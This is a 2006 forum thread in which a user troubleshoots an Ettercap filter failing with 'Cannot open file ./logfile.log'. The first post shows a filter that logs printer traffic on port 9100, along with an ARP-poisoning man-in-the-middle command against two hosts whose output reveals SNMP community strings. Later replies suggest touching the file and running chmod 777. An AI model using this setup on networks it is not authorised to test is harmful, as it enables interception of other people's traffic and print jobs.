-
March 6th, 2006, 10:30 PM
#1
Ettercap Filters Error "filter engine: Cannot open file ./logfile.log"
I've asked this on Ettercap's forum, but anyone who has visited there knows it's mostly filled with spam ads for porn and pharmaceuticals. I've also tried to Google for "ettercap filters" but my tutorials are the first things to come up. So, here I ask you guys.
I'm pretty sure the filter I wrote should work, but I always get the error "filter engine: Cannot open file ./logfile.log". Below is a printout of the code and all of the error messages. Any ideas on what is wrong? It's a Debian box I'm working on. Thanks.
Code:
ig:~# cat printsnarf.filter
if (ip.proto == TCP && tcp.dst == 9100) {
log(DATA.data, "./logfile.log");
}
ig:~#
ig:~# etterfilter printsnarf.filter -o ps.ef
etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
Parsing source file 'printsnarf.filter' done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
Writing output to 'ps.ef' done.
-> Script encoded into 6 instructions.
ig:~# ettercap -Tq -F /root/ps.ef -M arp /192.168.22.33/ /192.168.22.193/
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Content filters loaded from /root/ps.ef...
Listening on eth0... (Ethernet)
eth0 -> 00:E0:B8:30:4B:6C 192.168.30.130 255.255.240.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.22.33 00:60:B0:6D:47:C6
GROUP 2 : 192.168.22.193 00:11:43:BF:AF:57
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
SNMP : 192.168.22.33:161 -> COMMUNITY: public INFO: SNMP v1
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
SNMP : 192.168.22.193:1122 -> COMMUNITY: public INFO: SNMP v1
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
Closing text interface...
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.
ig:~#
-
March 7th, 2006, 05:11 AM
#2
Senior Member
I'm not sure what you're talking about...
but... what about using an absolute path like '/tmp/logfile.log'?
-
March 7th, 2006, 05:12 AM
#3
-
March 7th, 2006, 05:46 AM
#4
Senior Member
If the error only occurs using your "printsnarf.filter",
pls let us have a look (on_it)
-
March 7th, 2006, 05:48 AM
#5
I cat'ed out the code above, but here it is again:
Code:
if (ip.proto == TCP && tcp.dst == 9100) {
log(DATA.data, "./logfile.log");
}
-
March 7th, 2006, 06:47 AM
#6
I don't know how helpful this is, but I've seen similar problems with files locking on apache servers. If ettercap is writing to that logfile.log, it may not allow your filter to be accessing the data from that file at the same time. I don't know how that applies here though, because it seems like the filter would be allowed access to that file.
If not that, is it possible to just bypass that ./logfile.log and log your filter directly to DATA.data? (again, not familiar with all workings of ettercap)
"Experience is the hardest teacher, it gives the test first and the lesson after." Anonymous
-
March 7th, 2006, 03:12 PM
#7
Originally posted here by The_Captain
If not that, is it possible to just bypass that ./logfile.log and log your filter directly to DATA.data? (again, not familiar with all workings of ettercap)
That's not really how Ettercap works with filters. As best as I can tell from what little documentation there is, it should work as it is.
-
March 7th, 2006, 04:30 PM
#8
While this does not answer your question Irongeek, I found just one other site, besides your tuts that have some helpful information on ettercap:
http://securitypronews.com/securityp...andBeyond.html
While not an expert on this, what you have in your code should work. I will see if I can find something else and also bounce this off a few people.
Just to ask the stupid question:
1. Do you need to "touch" the logfile.log before running Ettercap?
"We're the middle children of history.... no purpose or place. We have no Great War, no Great Depression. Our great war is a spiritual war. Our great depression is our lives. We've all been raised by television to believe that one day we'll all be millionaires and movie gods and rock stars -- but we won't. And we're learning slowly that fact. And we're very, very pissed off." - Tyler (Brad Pitt) Fight Club.
-
November 1st, 2017, 07:16 AM
#9
Junior Member
Ettercap failures to log
This worked for me:
"touch" the file first, as recommended;
chmod + 777 on the log file to make sure etterfilter can write to it.
Good luck!
Originally Posted by genXer
While this does not answer your question Irongeek, I found just one other site, besides your tuts that have some helpful information on ettercap:
http://securitypronews.com/securityp...andBeyond.html
While not an expert on this, what you have in your code should work. I will see if I can find something else and also bounce this off a few people.
Just to ask the stupid question:
1. Do you need to "touch" the logfile.log before running Ettercap?